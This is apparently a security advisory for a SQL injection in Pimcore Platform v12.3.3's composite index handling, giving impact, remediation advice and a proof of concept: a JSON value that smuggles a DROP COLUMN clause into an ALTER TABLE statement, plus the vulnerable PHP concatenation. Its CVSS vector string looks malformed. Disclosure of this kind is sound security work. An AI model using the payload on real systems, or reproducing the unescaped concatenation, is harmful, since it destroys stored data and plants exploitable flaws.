# Pimcore Platform v12.3.3 SQL Injection Vulnerability Summary ## Vulnerability Overview * **Vulnerability Name**: Pimcore Platform v12.3.3 - DataObject composite index handling SQL Injection * **Vulnerability Type**: SQL Injection * **Severity**: High * **CVSS Score**: 7.0 (CVSS:3.0/AV:N/AC:L/AT:N/PR:H/UI:N/V:C/I:L/A:L/S:C/N/S/N/SAN) * **CVE ID**: CVE-2026-5394 * **Discoverer**: Oscar Naveda (Fluid Attacks AI SAST Scanner) * **Root Cause**: When importing or saving DataObject class definitions, the system accepts `compositeIndices` data from JSON. During processing of the `ALTER TABLE` statement, the backend does not perform strict identifier validation or escaping on the `index_columns` field, directly concatenating it into the SQL statement, allowing attackers to inject malicious SQL code. ## Impact Scope * **Affected Systems**: Pimcore Platform v12.3.3 * **Exploitation Conditions**: Requires an authenticated administrative user with permission to import or save class definitions. * **Potential Impacts**: * Unauthorized modification of object query/storage table schemas. * Denial of Service (DoS) of backend services by disrupting the expected table layout. * Compromise of data integrity for DataObject storage and queries. ## Remediation * **Current Status**: There is currently no patch available for this vulnerability. * **Recommended Measures**: Users should monitor official security updates, or implement strict whitelist validation and identifier escaping for imported JSON data at the application layer. ## Proof-of-Concept Code (PoC) ### 1. Malicious JSON Snippet The attacker injects SQL by modifying the `index_columns` field in the JSON: ```json { "compositeIndices": [ { "index_key": "poc_idx", "index_type": "query", "index_columns": [ "slider), DROP COLUMN co_classname -- " ] } ] } ``` ### 2. Generated Malicious SQL Statement The above JSON causes the backend to generate the following SQL statement: ```sql ALTER TABLE `object_query_` ADD INDEX `poc_idx` (`slider), DROP COLUMN co_classname -- `); ``` ### 3. Vulnerability Trigger Code Path (Source-to-Sink) The vulnerable core code is located in `models/DataObject/ClassDefinition/Service.php` and `models/DataObject/Traits/CompositeIndexTrait.php`: ```php // Vulnerable point: direct concatenation of unvalidated $columnName $this->db->executeQuery( 'ALTER TABLE ' . $table . ' ADD INDEX ' . $key . ' (' . $columnName . ');' ); ``` Here, `$columnName` is generated via `implode(',', $columns)` without any escaping or whitelist validation.